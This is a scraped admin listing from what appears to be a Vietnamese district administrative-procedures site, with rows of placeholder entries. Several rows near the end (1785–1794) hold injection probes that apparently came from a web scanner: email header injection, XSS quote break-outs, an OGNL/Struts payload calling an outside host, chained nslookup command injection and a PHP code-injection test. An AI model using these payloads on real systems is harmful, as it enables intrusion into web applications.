Quản lý Thủ Tục Hành Chính

Cơ quan thực hiện
Lĩnh vực
Từ khóa
STT Tên thủ tục Mức độ Cơ quan thực hiện
1 1 1 Cấp Quận
2 1 1 Cấp Quận
3 1 1 Cấp Quận
4 1 1 Cấp Quận
5 1 1 Cấp Quận
6 1 1 Cấp Quận
7 1 1 Cấp Quận
8 1 1 Cấp Quận
9 1 1 Cấp Quận
10 1 1 Cấp Quận
11 1 1 Cấp Quận
12 1 1 Cấp Quận
13 1 1 Cấp Quận
14 1 1 Cấp Quận
15 1 1 Cấp Quận
16 1 1 Cấp Quận
17 1 1 Cấp Quận
18 1 1 Cấp Quận
19 1 1 Cấp Quận
20 1 1 Cấp Quận

  Admin thu tuc hanh chinh

Cơ quan thực hiện
Lĩnh vực
Từ khóa
# Tên thủ tục Ngày tạo Trạng thái Thao tác
1701 1 1 Năm qua Đã đăng Xóa
1702 1 1 Năm qua Đã đăng Xóa
1703 1 1 Năm qua Đã đăng Xóa
1704 1 1 Năm qua Đã đăng Xóa
1705 1 1 Năm qua Đã đăng Xóa
1706 1 1 Năm qua Đã đăng Xóa
1707 1 1 Năm qua Đã đăng Xóa
1708 1 1 Năm qua Đã đăng Xóa
1709 1 1 Năm qua Đã đăng Xóa
1710 1 1 Năm qua Đã đăng Xóa
1711 1 1 Năm qua Đã đăng Xóa
1712 1 1 Năm qua Đã đăng Xóa
1713 1 1 Năm qua Đã đăng Xóa
1714 1 1 Năm qua Đã đăng Xóa
1715 1 1 Năm qua Đã đăng Xóa
1716 1 1 Năm qua Đã đăng Xóa
1717 1 1 Năm qua Đã đăng Xóa
1718 1 1 Năm qua Đã đăng Xóa
1719 1 1 Năm qua Đã đăng Xóa
1720 1 1 Năm qua Đã đăng Xóa
1721 1 1 Năm qua Đã đăng Xóa
1722 1 1 Năm qua Đã đăng Xóa
1723 1 1 Năm qua Đã đăng Xóa
1724 1 1 Năm qua Đã đăng Xóa
1725 1 1 Năm qua Đã đăng Xóa
1726 1 1 Năm qua Đã đăng Xóa
1727 1 1 Năm qua Đã đăng Xóa
1728 1 1 Năm qua Đã đăng Xóa
1729 1 1 Năm qua Đã đăng Xóa
1730 1 1 Năm qua Đã đăng Xóa
1731 1 1 Năm qua Đã đăng Xóa
1732 1 1 Năm qua Chưa đăng Xóa
1733 1 1 Năm qua Đã đăng Xóa
1734 1 1 Năm qua Đã đăng Xóa
1735 1 1 Năm qua Đã đăng Xóa
1736 1 1 Năm qua Đã đăng Xóa
1737 1 1 Năm qua Đã đăng Xóa
1738 1 1 Năm qua Chưa đăng Xóa
1739 1 1 Năm qua Đã đăng Xóa
1740 1 1 Năm qua Đã đăng Xóa
1741 1 1 Năm qua Đã đăng Xóa
1742 1 1 Năm qua Đã đăng Xóa
1743 1 1 Năm qua Đã đăng Xóa
1744 1 1 Năm qua Chưa đăng Xóa
1745 1 1 Năm qua Đã đăng Xóa
1746 1 1 Năm qua Đã đăng Xóa
1747 1 1 Năm qua Đã đăng Xóa
1748 1 1 Năm qua Đã đăng Xóa
1749 1 1 Năm qua Đã đăng Xóa
1750 1 1 Năm qua Chưa đăng Xóa
1751 1 1 Năm qua Đã đăng Xóa
1752 1 1 Năm qua Đã đăng Xóa
1753 1 1 Năm qua Đã đăng Xóa
1754 1 1 Năm qua Đã đăng Xóa
1755 1 1 Năm qua Chưa đăng Xóa
1756 1 1 Năm qua Đã đăng Xóa
1757 1 1 Năm qua Đã đăng Xóa
1758 1 1 Năm qua Đã đăng Xóa
1759 1 1 Năm qua Đã đăng Xóa
1760 1 1 Năm qua Đã đăng Xóa
1761 1 1 Năm qua Chưa đăng Xóa
1762 1 1 Năm qua Đã đăng Xóa
1763 1 1 Năm qua Đã đăng Xóa
1764 1 1 Năm qua Đã đăng Xóa
1765 1 1 Năm qua Đã đăng Xóa
1766 1 1 Năm qua Đã đăng Xóa
1767 1 1 Năm qua Chưa đăng Xóa
1768 1 1 Năm qua Đã đăng Xóa
1769 1 1 Năm qua Đã đăng Xóa
1770 1 1 Năm qua Đã đăng Xóa
1771 1 1 Năm qua Đã đăng Xóa
1772 1 1 Năm qua Đã đăng Xóa
1773 1 1 Năm qua Đã đăng Xóa
1774 1 1 Năm qua Đã đăng Xóa
1775 1 1 Năm qua Đã đăng Xóa
1776 1 1 Năm qua Đã đăng Xóa
1777 1 1 Năm qua Đã đăng Xóa
1778 1 1 Năm qua Đã đăng Xóa
1779 1 1 Năm qua Đã đăng Xóa
1780 1 1 Năm qua Đã đăng Xóa
1781 1 1 Năm qua Đã đăng Xóa
1782 1 1 Năm qua Đã đăng Xóa
1783 1 1 Năm qua Đã đăng Xóa
1784 1 1 Năm qua Đã đăng Xóa
1785 1%0abcc:065618.14-84595.14.bbadc.18172.2@bxss.me 1 Năm qua Đã đăng Xóa
1786 1'" 1 Năm qua Đã đăng Xóa
1787 1'"()&% 1 Năm qua Đã đăng Xóa
1788 1'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hit7bl07HHjvR.bxss.me/').openStream().close(),new java.lang.String(' 1 Năm qua Đã đăng Xóa
1789 1'>"> 1 Năm qua Đã đăng Xóa
1790 19783865 1 Năm qua Đã đăng Xóa
1791 1 1 Năm qua Đã đăng Xóa
1792 5ujCP8hK 1 Năm qua Đã đăng Xóa
1793 ;nslookup hitQlHtuBCX6S5928c.bxss.me|nslookup hitQlHtuBCX6S5928c.bxss.me&nslookup hitQlHtuBCX6S5928c.bxss.me; 1 Năm qua Đã đăng Xóa
1794 ;print(md5(31337)); 1 Năm qua Đã đăng Xóa
1795